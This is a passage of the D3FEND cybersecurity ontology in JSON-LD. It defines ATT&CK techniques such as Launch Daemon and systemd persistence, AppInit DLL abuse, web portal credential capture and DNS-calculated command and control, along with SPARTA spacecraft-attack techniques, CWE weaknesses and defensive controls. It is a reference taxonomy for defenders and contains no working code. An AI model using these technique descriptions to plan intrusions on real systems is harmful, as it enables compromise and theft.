      "d3f:definition": "A script used to initialize and configure elements of the system's environment, applications, services, or its operating system.",
      "rdfs:label": "System Init Script",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutableScript"
        },
        {
          "@id": "d3f:SystemConfigurationInitResource"
        },
        {
          "@id": "d3f:SystemInitConfiguration"
        }
      ]
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-6_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Timely Maintenance | Predictive Maintenance",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "MA-6(2)"
    },
    {
      "@id": "d3f:copy-of",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x copy-of y: The subject x is a duplicate of the object y.",
      "rdfs:label": "copy-of",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:DiskImage",
      "@type": "owl:Class",
      "d3f:definition": "A disk image is a snapshot of a storage device's structure and data typically stored in one or more computer files on another storage device.",
      "rdfs:isDefinedBy": {
        "@id": "https://en.wikipedia.org/wiki/Disk_image"
      },
      "rdfs:label": "Disk Image",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Disk_image"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:StorageImage"
      }
    },
    {
      "@id": "d3f:Projection-basedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PBC",
      "d3f:definition": "Projection Based Clustering is a clustering framework based on a chosen projection method and a parameter-free high-dimensional data visualization technique.",
      "d3f:kb-article": "## References\nR Core Team. (2021). ProjectionBasedClustering: Projection Based Clustering. [Link](https://cran.r-project.org/web/packages/ProjectionBasedClustering/ProjectionBasedClustering.pdf)\n\nLai, J. H., Liu, Y., & Wu, W. (2017). Projection Based Clustering. [Link](https://www.researchgate.net/publication/319006501_Projection_Based_Clustering)",
      "rdfs:label": "Projection-based Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:High-dimensionClustering"
      }
    },
    {
      "@id": "d3f:archived-at",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": {
        "@language": "en",
        "@value": "archived-at"
      },
      "rdfs:range": {
        "@id": "xsd:anyURI"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:T1543.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1543.004",
      "d3f:definition": "Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)",
      "d3f:modifies": {
        "@id": "d3f:PropertyListFile"
      },
      "rdfs:label": "Launch Daemon",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1543"
        },
        {
          "@id": "_:N3db209bbeb23424e9647d2aa5cb318b9"
        }
      ]
    },
    {
      "@id": "_:N3db209bbeb23424e9647d2aa5cb318b9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PropertyListFile"
      }
    },
    {
      "@id": "d3f:T1597.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1597.002",
      "d3f:definition": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.",
      "rdfs:label": "Purchase Technical Data",
      "rdfs:subClassOf": {
        "@id": "d3f:T1597"
      }
    },
    {
      "@id": "d3f:BusNetworkNode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:connected-to": {
        "@id": "d3f:BusNetwork"
      },
      "d3f:definition": "A device or logical endpoint whose interface is directly connected to a bus and exchanges data over the shared medium using the protocol implemented on that interface.",
      "d3f:transmits": {
        "@id": "d3f:BusNetworkTraffic"
      },
      "rdfs:label": "Bus Network Node",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Host"
        },
        {
          "@id": "_:N1e3d12c08a1749e584d2a0312b9bc27b"
        },
        {
          "@id": "_:N61ade077415d4cea89c9a7e9d589de9f"
        }
      ]
    },
    {
      "@id": "_:N1e3d12c08a1749e584d2a0312b9bc27b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:connected-to"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetwork"
      }
    },
    {
      "@id": "_:N61ade077415d4cea89c9a7e9d589de9f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:transmits"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1543.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1543.002",
      "d3f:definition": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.",
      "d3f:may-create": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      },
      "d3f:may-modify": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      },
      "rdfs:label": "Systemd Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1543"
        },
        {
          "@id": "_:N44826519c01d45d9a931829b374879a7"
        },
        {
          "@id": "_:N7f673bf761d64401afb6ad97e2e64481"
        }
      ]
    },
    {
      "@id": "_:N44826519c01d45d9a931829b374879a7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      }
    },
    {
      "@id": "_:N7f673bf761d64401afb6ad97e2e64481",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      }
    },
    {
      "@id": "d3f:Reference-ServiceOutlierExecutables_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-09-005/"
      },
      "d3f:kb-abstract": "New executables that are started as a service are suspicious. This analytic looks for anomalous service executables.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-09-005: Service Outlier Executables",
      "rdfs:label": "Reference - CAR-2013-09-005: Service Outlier Executables - MITRE"
    },
    {
      "@id": "d3f:CCI-000374_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated mechanisms to respond to unauthorized changes to organization-defined configuration settings.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:OperatingSystemMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000374"
    },
    {
      "@id": "d3f:T1568.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1568.003",
      "d3f:definition": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)",
      "rdfs:label": "DNS Calculation",
      "rdfs:subClassOf": {
        "@id": "d3f:T1568"
      }
    },
    {
      "@id": "d3f:CWE-710",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-710",
      "d3f:definition": "The product does not follow certain coding rules for development, which can lead to resultant weaknesses or increase the severity of the associated vulnerabilities.",
      "rdfs:label": "Improper Adherence to Coding Standards",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-09-005%3AAppInitDLLs_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-09-005/"
      },
      "d3f:kb-abstract": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. These values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes. Accordingly, this analytic looks for modifications to these registry keys that may be indicative of this type of abuse.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemInitConfigAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-09-005: AppInit DLLs",
      "rdfs:label": "Reference - CAR-2020-09-005: AppInit DLLs - MITRE"
    },
    {
      "@id": "d3f:CWE-506",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-506",
      "d3f:definition": "The product contains code that appears to be malicious in nature.",
      "rdfs:label": "Embedded Malicious Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-912"
      }
    },
    {
      "@id": "d3f:T1216",
      "@type": "owl:Class",
      "d3f:attack-id": "T1216",
      "d3f:definition": "Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)",
      "rdfs:label": "System Script Proxy Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:SubspaceClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SC",
      "d3f:definition": "Subspace clustering is an extension of traditional clustering that seeks to find clusters in different subspaces within a dataset.",
      "d3f:kb-article": "## References\nParsons, L., Haque, E., & Liu, H. (2004). Subspace Clustering for High Dimensional Data: A Review. [Link](https://www.kdd.org/exploration_files/parsons.pdf)",
      "rdfs:label": "Subspace Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:CorrelationClustering"
      }
    },
    {
      "@id": "d3f:RD-0003.01",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0003.01",
      "d3f:definition": "Threat actors obtain or adapt exploits (the trigger) and payloads (the action after exploitation) for space, ground, and cloud components. Targets include flight software parsers and table loaders, bootloaders and patch/update handlers, bus gateways, payload controllers, and ground services. Payloads may be binaries, scripts, or command/procedure sequences that alter modes, bypass FDIR, or stage follow-on access; they can also be “data payloads” that exploit weak validation (malformed tables, ephemeris, or calibration products). Acquisition paths mirror the broader market, brokered N-day/0-day packages, open-source exploits re-tooled for mission stacks, and theft from vendors or researchers. Actors tune timing, size/rate limits, and anti-replay nuances so delivery fits pass windows and link budgets, and they rehearse on flatsats to achieve deterministic outcomes.",
      "rdfs:label": "Exploit/Payload - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0003/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0003"
      },
      "skos:prefLabel": "Exploit/Payload"
    },
    {
      "@id": "d3f:T1546.010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.010",
      "d3f:definition": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppInit_DLLs</code> value in the Registry keys <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> or <code>HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:loads": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "AppInit DLLs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N56dd777d13ad4e31b7385f96e3a1aa4e"
        },
        {
          "@id": "_:N3eba7b9345864dda9aadc873f9b6da23"
        },
        {
          "@id": "_:N7c79a89c701f46ca9f35f53f28e60ff4"
        }
      ]
    },
    {
      "@id": "_:N56dd777d13ad4e31b7385f96e3a1aa4e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N3eba7b9345864dda9aadc873f9b6da23",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N7c79a89c701f46ca9f35f53f28e60ff4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:ATLASThing",
      "@type": "owl:Class",
      "rdfs:label": "ATLAS Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThreatModelThing"
      }
    },
    {
      "@id": "d3f:T1056.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1056.003",
      "d3f:definition": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.",
      "d3f:modifies": {
        "@id": "d3f:WebApplication"
      },
      "rdfs:label": "Web Portal Capture",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1056"
        },
        {
          "@id": "_:N5aba0c47088747acb0ae228ff4bc36b7"
        }
      ]
    },
    {
      "@id": "_:N5aba0c47088747acb0ae228ff4bc36b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebApplication"
      }
    },
    {
      "@id": "d3f:IA-0007.01",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0007.01",
      "d3f:definition": "Adversaries may target the pipeline that produces and transmits updates to an on-orbit vehicle. Manipulation points include source repositories and configuration tables, build and packaging steps that generate images or differential patches, staging areas on ground servers, update metadata (versions, counters, manifests), and the transmission process itself. Spacecraft updates span flight software patches, FPGA bitstreams, bootloader or device firmware loads, and operational data products such as command tables, ephemerides, and calibration files, each with distinct formats, framing, and acceptance rules. An attacker positioned in the ground system can substitute or modify an artifact, alter its timing and timetags to match pass windows, and queue it through the same procedures operators use for nominal maintenance. Activation can be immediate or deferred: implants may lie dormant until a specific mode, safing entry, or table index is referenced.",
      "rdfs:label": "Compromise On-Orbit Update - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0007/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0007"
      },
      "skos:prefLabel": "Compromise On-Orbit Update"
    },
    {
      "@id": "d3f:T1095",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1095",
      "d3f:definition": "Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Non-Application Layer Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N0afa7ad0a40341288a6edd31dd32ca28"
        }
      ]
    },
    {
      "@id": "_:N0afa7ad0a40341288a6edd31dd32ca28",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:Reference-DetectingNetworkReconnaissanceByTrackingIntranetDark-netCommunications_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20150264078A1"
      },
      "d3f:kb-abstract": "A method and system for detecting network reconnaissance is disclosed wherein network traffic can be parsed into unidirectional flows that correspond to sessions. A learning module may categorize computing entities inside the network into assets and generate asset data to monitor the computing entities. If one or more computing entities address a flow to an address of a host that no longer exists, ghost asset data may be recorded and updated in the asset data. When a computing entity inside the network contacts an object in the dark-net, the computing entity may be recorded a potential mapper. When the computing entity tries to contact a number of objects in the dark-net, such that a computed threshold is exceeded, the computing entity is identified a malicious entity performing network reconnaissance.",
      "d3f:kb-author": "Nicolas BEAUCHESNE; Sungwook Yoon",
      "d3f:kb-mitre-analysis": "This patent describes detecting an attacker performing internal reconnaissance within an organization's network to gather intelligence about the configuration of the network or identify the next target.  Network packets are collected (ex. tapped from a network switch) and processed to create flows that are used to map out the network to identify network assets as well as ghost assets (addresses not assigned to a device or an existing device that is temporarily disabled). Once this mapping is complete it is used to monitor the network to determine if an attacker is attempting to connect to a ghost asset. If an attacker attempts to connect to a ghost asset over a threshold (ex. contacting four ghost assets in less than seven minutes), an alert is generated.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ConnectionAttemptAnalysis"
      },
      "d3f:kb-reference-title": "Detecting network reconnaissance by tracking intranet dark-net communications",
      "rdfs:label": "Reference - Detecting network reconnaissance by tracking intranet dark-net communications - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:CWE-1108",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1108",
      "d3f:definition": "The code is structured in a way that relies too much on using or setting global variables throughout various points in the code, instead of preserving the associated information in a narrower, more local context.",
      "rdfs:label": "Excessive Reliance on Global Variables",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:T1591.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1591.002",
      "d3f:definition": "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.",
      "rdfs:label": "Business Relationships",
      "rdfs:subClassOf": {
        "@id": "d3f:T1591"
      }
    },
    {
      "@id": "d3f:MoveFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system call to rename or move a file.  Linux's rename() is an example of this kind of system call. Another way of handling it is to call a copy file system call followed by a delete file system call.",
      "d3f:modifies": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "Move File",
      "rdfs:seeAlso": {
        "@id": "https://man7.org/linux/man-pages/man2/rename.2.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nbf8bcb59b51a4eccb585039c800994f4"
        }
      ],
      "skos:altLabel": "Rename File"
    },
    {
      "@id": "_:Nbf8bcb59b51a4eccb585039c800994f4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:T1602",
      "@type": "owl:Class",
      "d3f:attack-id": "T1602",
      "d3f:definition": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.",
      "rdfs:label": "Data from Configuration Repository",
      "rdfs:subClassOf": {
        "@id": "d3f:CollectionTechnique"
      }
    },
    {
      "@id": "d3f:CWE-237",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-237",
      "d3f:definition": "The product does not handle or incorrectly handles inputs that are related to complex structures.",
      "rdfs:label": "Improper Handling of Structural Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-228"
      }
    },
    {
      "@id": "d3f:AML.T0085.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0085.000",
      "d3f:definition": "Adversaries may prompt the AI service to retrieve data from a RAG database. This can include the majority of an organization's internal documents.",
      "rdfs:label": "RAG Databases - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0085.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0085"
      },
      "skos:prefLabel": "RAG Databases"
    },
    {
      "@id": "d3f:CWE-173",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-173",
      "d3f:definition": "The product does not properly handle when an input uses an alternate encoding that is valid for the control sphere to which the input is being sent.",
      "rdfs:label": "Improper Handling of Alternate Encoding",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-172"
      }
    },
    {
      "@id": "d3f:Reference-Web-BasedEnterpriseManagement",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.dmtf.org/standards/wbem"
      },
      "d3f:kb-organization": "Distributed Management Task Force (DMTF)",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ConfigurationInventory"
        },
        {
          "@id": "d3f:HardwareComponentInventory"
        },
        {
          "@id": "d3f:NetworkNodeInventory"
        },
        {
          "@id": "d3f:SoftwareInventory"
        }
      ],
      "d3f:kb-reference-title": "Web-Based Enterprise Management",
      "rdfs:label": "Reference - Web-Based Enterprise Management"
    },
    {
      "@id": "d3f:Reference-AccountMonitoring_ForescoutTechnologies",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190205511A1"
      },
      "d3f:kb-abstract": "Systems, methods, and related technologies for account access monitoring are described. In certain aspects, a login request associated with a device can be analyzed and a score determined. The score and a threshold can be used to determine whether to initiate an action.",
      "d3f:kb-author": "Chunhui Zhan, Siying Yang",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Forescout Technologies",
      "d3f:kb-reference-of": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:kb-reference-title": "Account monitoring",
      "rdfs:label": "Reference - Account monitoring - Forescout Technologies"
    },
    {
      "@id": "d3f:CWE-576",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-576",
      "d3f:definition": "The product violates the Enterprise JavaBeans (EJB) specification by using the java.io package.",
      "rdfs:label": "EJB Bad Practices: Use of Java I/O",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-695"
      }
    },
    {
      "@id": "d3f:LinuxRead",
      "@type": "owl:Class",
      "d3f:definition": "Read from a file descriptor.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/read.2.html"
      },
      "rdfs:label": "Linux Read",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIReadFile"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_IA-2_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Identification and Authentication (organizational Users) | Multi-factor Authentication to Non-privileged Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "rdfs:label": "IA-2(2)"
    },
    {
      "@id": "d3f:DescriptiveStatistics",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DS",
      "d3f:definition": "Descriptive statistics provide simple summaries about the sample and about the observations that have been made.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Descriptive statistics. [Link](https://en.wikipedia.org/wiki/Descriptive_statistics)",
      "rdfs:label": "Descriptive Statistics",
      "rdfs:subClassOf": {
        "@id": "d3f:StatisticalMethod"
      }
    },
    {
      "@id": "d3f:T0810",
      "@type": "owl:Class",
      "d3f:attack-id": "T0810",
      "d3f:definition": "Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Data Historian Compromise - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Data Historian Compromise"
    },
    {
      "@id": "d3f:CloudServiceSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Senses data from cloud service platforms. Including data from cloud service  authentications, authorizations, and other activities.",
      "d3f:monitors": [
        {
          "@id": "d3f:CloudServiceAuthentication"
        },
        {
          "@id": "d3f:CloudServiceAuthorization"
        }
      ],
      "rdfs:label": "Cloud Service Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CyberSensor"
        },
        {
          "@id": "_:Nbb4a68a7b5b946eaa58a2d495a7a7c43"
        },
        {
          "@id": "_:Nc5c36fea6ca144fd8a8d1c054e8ad24a"
        }
      ]
    },
    {
      "@id": "_:Nbb4a68a7b5b946eaa58a2d495a7a7c43",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudServiceAuthentication"
      }
    },
    {
      "@id": "_:Nc5c36fea6ca144fd8a8d1c054e8ad24a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudServiceAuthorization"
      }
    },
    {
      "@id": "d3f:T1027.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.008",
      "d3f:definition": "Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)",
      "rdfs:label": "Stripped Payloads",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:BootloaderAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:BootloaderAuthentication"
      ],
      "d3f:authenticates": {
        "@id": "d3f:BootLoader"
      },
      "d3f:d3fend-id": "D3-BA",
      "d3f:definition": "Cryptographically authenticating the bootloader software before system boot.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UEFIPlatformInitialization-Specification"
      },
      "d3f:synonym": "Secure Boot",
      "rdfs:label": "Bootloader Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:Nf18b231fad4f4a2aa21e056fe55b27f8"
        }
      ]
    },
    {
      "@id": "_:Nf18b231fad4f4a2aa21e056fe55b27f8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "d3f:Reference-CertificateTransparency",
      "@type": [
        "owl:NamedIndividual",
        "d3f:TechniqueReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.certificate-transparency.org/"
      },
      "d3f:kb-abstract": "Google's Certificate Transparency project fixes several structural flaws in the SSL certificate system, which is the main cryptographic system that underlies all HTTPS connections.\n\nThese flaws weaken the reliability and effectiveness of encrypted Internet connections and can compromise critical TLS/SSL mechanisms, including domain validation, end-to-end encryption, and the chains of trust set up by certificate authorities.",
      "d3f:kb-author": "Google",
      "d3f:kb-organization": "Google",
      "d3f:kb-reference-of": {
        "@id": "d3f:PassiveCertificateAnalysis"
      },
      "d3f:kb-reference-title": "Certificate Transparency",
      "rdfs:label": "Reference - Certificate Transparency"
    },
    {
